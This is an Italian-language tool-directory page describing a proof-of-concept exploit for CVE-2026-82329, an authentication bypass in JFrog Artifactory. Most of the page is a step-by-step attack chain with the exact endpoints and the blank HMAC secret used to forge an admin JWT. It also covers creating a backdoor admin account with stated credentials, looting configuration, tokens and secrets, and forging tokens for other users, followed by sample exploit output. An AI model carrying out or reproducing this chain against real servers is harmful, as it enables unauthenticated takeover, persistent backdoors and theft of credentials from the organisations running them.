Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-82329-JFrog-Artifactory- — Exploit PoC per CVE-2026-82329, un bypass dell'autenticazione in JFrog Artifactory. Dimostra la falsificazione di token JWT per ottenere accesso admin e creare un utente backdoor persistente. | Kitploit
Strumenti/GitHubGitHub/0xterror/cve-2026-82329-jfrog-artifactory-
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHub0xterror/cve-2026-82329-jfrog-artifactory-

CVE-2026-82329-JFrog-Artifactory-

Exploit PoC per CVE-2026-82329, un bypass dell'autenticazione in JFrog Artifactory. Dimostra la falsificazione di token JWT per ottenere accesso admin e creare un utente backdoor persistente.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
16h 31m faNon ancora revisionato

CVE-2026-82329-JFrog-Artifactory-

CVE-2026-82329 — Bypass dell'autenticazione in JFrog Artifactory

La vulnerabilità

Bypass critico dell'autenticazione in JFrog Artifactory (versioni 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19). La falla consente a un attaccante non autenticato di forgiare un JWT utilizzando un segreto HMAC vuoto (32 byte di 0x20), generare un token admin e creare un utente backdoor.

Catena di sfruttamento

Passaggio Azione 1 Forgiare JWT con alg=HS256, kid=SHA256(""), skip_node_registration=true 2 Inviare JWT a /access/api/v1/registry/join → ottenere token SERVICE 3 Scambiare il token SERVICE per un token ADMIN tramite /access/api/v1/tokens 4 Verificare l'accesso admin tramite /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version 5 Creare un utente admin persistente tramite /artifactory/api/security/users/{user} 6 Saccheggiare config, token, utenti, repository, segreti 7 Forgiare token per soggetti ad alto valore

Flusso dell'attacco

root@kitploit:~
BLANK_SECRET = b"\x20" * 32
    ↓
Forgia JWT (HS256, kid=hashlib.sha256(""))
    ↓
POST /access/api/v1/registry/join
    ↓
Token SERVICE (scp=admin)
    ↓
POST /access/api/v1/tokens
    ↓
Token ADMIN (scp=applied-permissions/admin, aud=*)
    ↓
Prova di Admin (GET /artifactory/api/system/configuration → 200)
    ↓
PUT /artifactory/api/security/users/0xTerror
    ↓
Utente Admin Persistente: 0xTerror:Terrorp0c!7777
    ↓
Saccheggio: Config, Token, Utenti, Repository, Segreti
    ↓
Verifica Pivot: Xray, Mission Control, Distribution, ecc.
    ↓
Forgia Token per Soggetti ad Alto Valore

Esempio di Output del PoC

root@kitploit:~
[+] Step 1  /registry/join -> HTTP 201 token SERVICE (scp=admin)
[+] Step 2  /access/api/v1/tokens -> HTTP 200 token ADMIN (scp=applied-permissions/admin)
[+] Step 3  prova di admin: config=200, tokens=200, version=200
[+] Step 4  crea utente admin '0xTerror' -> HTTP 201
[=] VULNERABILE — attaccante non autenticato ha ottenuto ADMIN
      Utente admin: 0xTerror:Terrorp0c!7777
Scarica lo strumento